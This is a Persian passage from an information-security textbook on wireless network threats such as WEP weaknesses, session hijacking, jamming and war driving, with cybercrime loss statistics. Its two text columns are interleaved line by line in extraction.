ﺍﺳﺖ ﻛﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺍﻳﻨﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻨﺘﺸﺮ ﻧﻜﻨﻨﺪ ﻣﺒﻠﻎ
ﺑﻪ ﻧﺤﻮﻱ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ ﻛﻪ ﺿـﺎﻣﻦ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ ﺑﺎﺷـﺪ .ﺭﺳـﺎﻧﺔ ﮔﺰﺍﻓﻲ ﺭﺍ ﺍﺯ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑﺎﺝﺧﻮﺍﻫﻲ ﻛﺮﺩﻧﺪ .ﺑﻌـﺪ ﺍﺯ ﺁﻥ ﻧﻴـﺰ ﺩﺭ
ﺑﻲﺳﻴﻢ -ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺟﻬﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ -ﺭﺳـﺎﻧﺔ ﺷﺐ ﻛﺮﻳﺴﻤﺲ ﺍﺯ ﻣﻮﺟـﻮﺩﻱ ﻫـﺮ ﻛـﺎﺭﺕ ﻣﺒﻠـﻎ ﻛـﻮﭼﻜﻲ ﻛـﻢ
ﺍﻣﻨﻲ ﻧﻴﺴﺖ .ﺷﺘﺎﺏ ﭼﺸﻤﮕﻴﺮ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺳﺎﺯﮔﺎﺭﻱ ﺑﺎ ﺑـﺴﺘﺮ ﻛﺮﺩﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺸﻜﻞ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺎﻟﻲ ﻭ ﺣﻴﺜﻴﺘـﻲ ﺍﺳـﺖ.
ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺳﺮﮔﺮﺩﺍﻧﻲ ﺑﺰﺭﮔﻲ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺍﺳﺖ. ﻳﻚ ﭘﻴﺶ ﺑﻴﻨﻲ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳﻦ ﺍﻣـﺮ ﺍﺳـﺖ ﻛـﻪ ﺣـﻮﺍﺩﺙ ﺳـﺮﻗﺖ
ﻫﻮﻳﺖ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑـﻴﺶ ﺍﺯ ﺳـﻪ ﺑﺮﺍﺑـﺮ ﺧﻮﺍﻫـﺪ ﺷـﺪ ﻭ ﺍﺯ
ﺝ .ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ ۷۰۰,۰۰۰ﺩﻻﺭ ١٤٨ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ ۱،۷ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ
ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑـﻪ ﺳـﻪ ﺷـﻜﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ ۲۰۰۵ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ؛ ﻭ ﻫﺰﻳﻨـﺔ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﻫـﻢ ﺑـﺎ
ﻣﻲﺑﺎﺷﻨﺪ :ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ ﻛﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ 802.11b
ﺍﻓﺰﺍﻳﺶ %۳۰ﺍﺯ ﻣـﺮﺯ ۸ﻣﻴﻠﻴـﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳـﺎﻝ ۲۰۰۵ﺧﻮﺍﻫـﺪ
١٤٩
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺷﺒﻜﻪﻫﺎﻱ ) CDMA/TDMA/GSMﺗﻠﻔـﻦ
ﮔﺬﺷﺖ.
ﻫﻤﺮﺍﻩ ﻭ (PCSﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭ PDAﻫـﺎ؛ ﻭ ﺟــﺮﺍﺋﻢ ﺳــﺎﻳﺒﺮ ﺭﺷــﺪ ﭼــﺸﻢﮔﻴــﺮﻱ ﺩﺍﺷــﺘﻪ ﺍﺳــﺖ .ﺣﻤﻠــﻪ ﺑــﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﻜﺮﻭ ﻭﻳﻮ ﭘﺮﻗﺪﺭﺕ ﻛﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﻠﻔﻦ ﺟﻬـﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻧﺴﺒﺖ ﺑﻪ ﺳﺎﻝ ۲۰۰۰ﺩﻭ ﺑﺮﺍﺑﺮ
ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺴﺎﻓﺘﻬﺎﻱ ﻃﻮﻻﻧﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ .ﺑـﺎ ﺍﻳﻨﻜـﻪ ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ %۹۰ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘﻨـﺪ
ﻫﺮ ﺳﻪ ﻣﻮﺭﺩ ﻓﻮﻕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻣﻌﻤﻮﻝ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﻫﻤﮕـﻲ ﻋﻠﻴـﺮﻏﻢ ﺑﺮﺧـﻮﺭﺩﺍﺭﻱ ﺍﺯ ﺍﻧـﻮﺍﻉ ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ ،ﺑـﻪ ﻭﻳﺮﻭﺳــﻬﺎ ﻭ
ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻭ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻛﺎﻧﺲ ﻛﺮﻣﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻟﻮﺩﻩ ﺷـﺪﻩ ﺑﻮﺩﻧـﺪ ١٥٠.ﺗﺤﻘﻴـﻖ ﺳـﺎﻝ ۲۰۰۱
ﺭﺍﺩﻳﻮﻳﻲ ) (RFﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ CSI/FBIﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺘـﻲ ﻧـﺸﺎﻥ ﺩﺍﺩ ﻛـﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺸﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺑﻴﺎﻧﺠﺎﻣﺪ. ﺑﺪﻟﻴﻞ ﻧﻔﻮﺫﻫﺎ ﺑﻴﺶ ﺍﺯ ۳۷۷ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺑﻪ ﺑـﺎﺭ ﺁﻣـﺪﻩ
١٥١
ﺷﺒﻜﻪ ﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺼﻮﺭﺕ ﺍﻧﻔﺠـﺎﺭﻱ ﮔـﺴﺘﺮﺵ ﭘﻴـﺪﺍ ﻛﺮﺩﻧـﺪ. ﺍﺳﺖ.
ﻱ ﻣﺪﺍﻭﻡ ﺍﺗـﺼﺎﻻﺕ ﺑﺎﻋـﺚ ﻲ ﻧﺼﺐ ﻭ ﺑﺮﻗﺮﺍﺭ ﹺ
ﻫﺰﻳﻨﺔ ﻧﺎﭼﻴﺰ ،ﺳﺎﺩﮔ ﹺ ﺩﻟﻴﻞ ﺍﺻﻠﻲ ﻋﺪﻡ ﺑﺮﺧﻮﺭﺩ ﻣﻨﺎﺳﺐ ﺑﺎ ﺍﻳﻦ ﺩﺳﺘﻪ ﺣـﻮﺍﺩﺙ ﺩﺭ ﺩﻧﻴـﺎ
ﮔﺴﺘﺮﺵ ﺳﺮﻳﻊ ﺁﻧﻬﺎ -ﺑﺨﺼﻮﺹ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ - ﺗﺮﺱ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺁﻧﻬـﺎ ﺍﺳـﺖ ١٥٢.ﺷـﺮﻛﺘﻬﺎﻱ ﻣـﺎﻟﻲ ﺑـﺪﻟﻴﻞ
ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻭﺍﻗﻊ ﮔﻤﺎﻥ ﻣﻲﺭﻓﺖ ﻛـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﻲﺳـﻴﻢ
ﻫﻤﺎﻥ ﻛﺎﺭﺑﺮﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺳـﻨﺘﻲ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺍﻣـﺎ ﺑـﺪﻭﻥ
۱۴۸ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺟﻬﺘﮕﻴﺮﻱ ﺳﺎﻻﻧﻪ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑﻞ .ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﺷﺒﻜﻪﻫـﺎ ﺑـﺪﻟﻴﻞ ﺳـﻬﻮﻟﺖ ﻛـﺎﺭ ۱۴۹ﺍﻳﻦ ﻧﺘﺎﻳﺞ ﺩﺭ ﮔﺰﺍﺭﺷﻲ ﺍﺯ ﻣﺆﺳﺴﺔ Celent Communications
ﻛــﺎﺭﺑﺮﺍﻥ ﺍﺳــﺖ ﻭ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﺗﺤــﺖ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻣﻨﺘﺸﺮ ﺷﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ FTCﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ
ﺍﺳﺖ.
150 http://www.infosecuritymag.com/articles/
october01/images/survey.pdf
ﺿﺮﺭﻫﺎﻱ ﻣﺎﻟﻲ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﮔﺰﺍﺭﺵ ﻣﻲﺷﻮﺩ .ﺑﺮ ﺍﺳـﺎﺱ ۱۵۱ﻧﻤﺎﻳﻨﺪﺓ ﻭﻳﮋﺓ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺳـﺮﻭﻳﺲ ﻣﺨﻔـﻲ ﺟـﺮﺍﺋﻢ ﻣـﺎﻟﻲJames ،
ﺗﺠﺮﺑﺔ ﻣﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻨﺪ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ،Savageﮔﻔﺘــﻪ" :ﺍﻳــﻦ ﺁﻣــﺎﺭ ﺣﻜﺎﻳــﺖ ﺍﺯ ﺍﺷــﻜﺎﻻﺕ ﺟــﺪﻱ ﺩﺭ
ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺧﻮﺩ ﺭﺍ ﮔﺰﺍﺭﺵ ﻛﻨﻨﺪ .ﺑﻨﻈﺮ ﻣﻦ ﺳﺎﻝ ﺑـﻪ ﺳـﺎﻝ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﻣﻌﻨـﻲ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺟﺎﻣﻌـﺔ
ﻣﻲﺗﻮﺍﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩﻱ ﺩﺭ ﺯﻳـﺎﻥ ﺷـﺮﻛﺘﻬﺎ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨـﻲ ﺗﺠﺎﺭﻱ ﺗﻤﺎﻳﻞ ﺩﺍﺭﺩ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻈـﺮ ﺁﺳـﻴﺐ ﺩﻳـﺪﻩ " .ﺍﻭ ﻣﻌﺘﻘـﺪ
ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ ،ﭼﺮﺍﻛﻪ ﺷﺮﻛﺘﻬﺎ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛـﻪ ﻫـﺮ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﺑﻴﺎﻧﮕﺮ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﺍﺯ ﻭﺍﻗﻌﻴﺖ ﺁﺳـﻴﺒﻬﺎﻱ
ﻛﺲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﻳﻚ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ ،ﻭ ﻗﺮﺑـﺎﻧﻲ ﺷـﺪﻥ ﺩﺭ ﻭﺍﺭﺩﻩ ﺑﻪ ﺟﺎﻣﻌﺔ ﺗﺠﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺑﺎﺷﺪ ۳) .ﺍﻛﺘﺒﺮ (۲۰۰۳
ﺣﻤﻼﺕ ﺑﺘﺪﺭﻳﺞ ﻣﻮﺭﺩ ﻗﺒﻮﻝ ﻭﺍﻗﻊ ﺷﺪﻩ ﻭ ﺩﻳﮕﺮ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﻣﺮﺑﻮﻁ ﺑـﻪ ۱۵۲ﻧﻤﺎﻳﻨﺪﺓ ﻣﺨﺼﻮﺹ ،Cornelius Tate ،CERTﺑﻪ ﺍﻳـﻦ ﺗﻤﺎﻳـﻞ
ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﮔﺬﺷﺘﻪ ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺍﻃﻤﻴﻨﺎﻥ ﻋﻤﻮﻣﻲ ﻧﻤﻲﺷﻮﺩ". ﺑﻪ ﮔﺮﻳﺰ ﺍﺯ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺭﺧﺪﺍﺩﻫﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ" :ﻓﻜﺮ ﻣﻲﻛﻨﻢ
١٨٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺍﺷﺘﻦ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺐ ،ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻣﺤـﺪﻭﺩﻩ ﺍﺭﺳـﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ IEEE 802.11ﻭ ﺩﺭ ﺍﺭﻭﭘﺎ ﺗﺤـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭ GSM
ﺑﺴﺘﻪ ﻫﺎ ﺑﺎﺷﺪ ،ﻗﺎﺩﺭ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ .ﻭﺳـﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ .ﻫﻨﮕﺎﻡ ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ،ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ
ﺗﻘﻮﻳﺖ ﺳﻴﮕﻨﺎﻝ ﻭ ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻩ ﻧﻴـﺰ ﺑـﻪ ﻭﻓـﻮﺭ ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﺷﻮﺩ.
ﻣﻬﻴﺎﺳﺖ؛ ﻭ ﻟﺬﺍ ﻧﺎﺣﻴﻪﺍﻱ ﻛـﻪ ﺗـﺼﺎﺣﺐ ﺗﺮﺍﻓﻴـﻚ ﺩﺭ ﺁﻥ ﻫﻔﺖ ﺩﺳﺘﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻭﻟﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ
ﻣﻤﻜﻦ ﺍﺳﺖ ،ﻭﺳﻴﻊ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺁﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ. ١٥٣
ﻗﺎﺑﻞ ﺫﻛﺮ ﺍﺳﺖ:
ﺍﺭﺗﺒﺎﻁ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺑﺎ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺩﻳﮕـﺮ :ﺍﻏﻠـﺐ .۶ ﺣﻤﻼﺕ ﺩﺭﺝ :١٥٤ﻧﻔﻮﺫﮔﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ .۱
ﻧﻘــﺎﻁ ﺳــﻴﺎﺭ )ﻣﺜــﻞ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺎﺑــﻞ ﺣﻤــﻞ ﻭ PDAﻫــﺎ( ﻧﻘﻄﻪ ﺩﺳﺘﺮﺳﻲ ﺳﻴﺎﺭ ١٥٥ﻧﺎﺍﻣﻦ ،ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ "ﺩﺍﺩﻩ" ﻭﺍﺭﺩ
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺧﺪﻣﺎﺕ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﻫﺮﮔﻮﻧـﻪ ﺧـﺪﻣﺎﺕ ﻛﻨﺪ.
TCP/IPﺭﻭﻱ ﺁﻧﻬــﺎ ﻓﻌــﺎﻝ ﺑﺎﺷــﺪ ،ﻗــﺎﺩﺭ ﺑــﻪ ﺍﺭﺗﺒــﺎﻁ
ﺑﻲﻭﺍﺳﻄﻪ ﻭ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ ﺳﺮﻗﺖ ﺟﻠﺴﻪ :١٥٦ﻛﻪ ﺑﻪ ""man in the middle .۲
ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﻗﺎﺩﺭ ﺍﺳﺖ ﻳﻚ ﻓﺎﻳـﻞ ﻧﻴﺰ ﻣﻌﺮﻭﻑ ﺍﺳﺖ ،ﺑﺮ ﺍﺳﺎﺱ ﺍﻳﻦ ﺍﻳﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﺩﺭ
ﻳﺎ ﺑﺮﻧﺎﻣﺔ ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺷﻤﺎ ﻣﻨﺘﻘﻞ ﻛﻨﺪ. ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ،ﺗﻠﻔـﻦ ﻫﻮﻳـﺖ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨـﺪ ،ﺍﻣـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ
ﺗﻨﻈﻴﻤﺎﺕ ﻧﺎﺩﻗﻴﻖ :ﻫﺮﮔﻮﻧﻪ ﺍﺑﺰﺍﺭ ،ﺧﺪﻣﺎﺕ ،ﻳـﺎ ﺑﺮﻧﺎﻣـﺔ .۷ ﺑﺮﺍﻱ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﺪ؛ ﭘﺲ ﻣﻲﺗـﻮﺍﻥ ﻳـﻚ ﺟﻠـﺴﺔ
ﺑﺨﺶ ﺳﻮﻡ
ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷـﺪ ،ﻛـﻞ ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺗﻠﻔﻦ ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺗﻠﻔﻦ
ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻮﺿﻮﻉ ﭘﻲ ﺑﺒﺮﺩ ﺳﺮﻗﺖ ﻛـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ
ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﻲ ﺳـﻴﻢ ،ﺑﻄـﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ.
ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﺮﮔﻮﻧﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺧـﺪﻣﺎﺕ
ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ .ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﭘﺎﺭﺍﺯﻳﺖ ﺩﺍﺩﻥ :ﺍﻳﻦ ﺣﻤﻠﻪ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ .۳
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺳﻴﺎﺭ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺩﺭﺧﻮﺍﺳـﺖ ﺳﺮﻭﻳﺲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﺩﺍﺩﻩﭘﺮﺍﻛﻨﻲ ﻭ ﭘﺨﺶ
ﺟﻠﺴﺔ telnetﻳﺎ ftpﻧﻤﻮﺩﻩ ﻭ ﭘﺎﺳﺦ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ. ﻱ ﺷﺒﻜﺔ ﺷﻤﺎ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ ﺲ ﻛﺎﺭ ﹺﻋﻤﻮﻣﻲ ١٥٧ﺩﺭ ﻓﺮﻛﺎﻧ ﹺ
ﺩﺭ ﻃﻴــﻒ ﻓﺮﻛــﺎﻧﺲ ﺭﺍﺩﻳــﻮﻳﻲ ﺷــﺒﻜﺔ ﺑــﻲﺳــﻴﻢ ﺍﻳﺠــﺎﺩ
ﺣﻤــﻼﺕ :Brute Forceﺍﻏﻠــﺐ ﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ .۸ ﺳﺮﺭﻳﺰ ١٥٨ﻛﻨﺪ.
ﺑﻲﺳﻴﻢ ،ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺣﻤﻼﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ :١٥٩ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ .۴
ﺑﻲﺳـﻴﻢ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ) brute forceﻣـﺜ ﹰ
ﻼ ﺑـﺮ IEEE 802.11ﺍﺯ ﺍﻟﮕـــﻮﺭﻳﺘﻢ ١٦٠WEPﺑـــﺮﺍﻱ
ﺍﺳﺎﺱ ﻳﻚ ﻓﺮﻫﻨﮓ ﻟﻐﺖ( ﻧﺎﺍﻣﻦ ﻛﺮﺩﻩ ﺍﺳﺖ. ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨــﺪ .ﺭﻭﺵ ﺭﻣــﺰﮔــﺬﺍﺭﻱ ﻭ
ﺑﺮﺩﺍﺭﻫﺎﻱ ﻣﻘـﺪﺍﺭ ﺍﻭﻟﻴـﺔ ﺍﻳـﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺑـﺴﻴﺎﺭ ﺿـﻌﻴﻒ
War Driving ﻫﺴﺘﻨﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺑﺎﺭﻫﺎ ﺷﻜﺴﺘﻪ ﺷﺪﻩﺍﻧﺪ.
ﺟﺎﺳﻮﺳﻲ ﺻﻨﻌﺘﻲ ﻭ ﺟﺮﺍﺋﻢ ﺍﺩﺍﺭﻱ ﺑﺎ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ
ﺗﺼﺎﺣﺐ ﺗﺮﺍﻓﻴﻚ ﻭ ﺍﻧﺠﺎﻡ ﺩﻳﺪﻩﺑﺎﻧﻲ :ﺑﺮﺩ ﺗﻘﺮﻳﺒﻲ .۵
ﺑﻪ ﺑﺎﻻﺗﺮﻳﻦ ﺣﺪ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩﺍﻧـﺪ War dialing .ﺑـﻪ ﻣﻌﻨـﺎﻱ
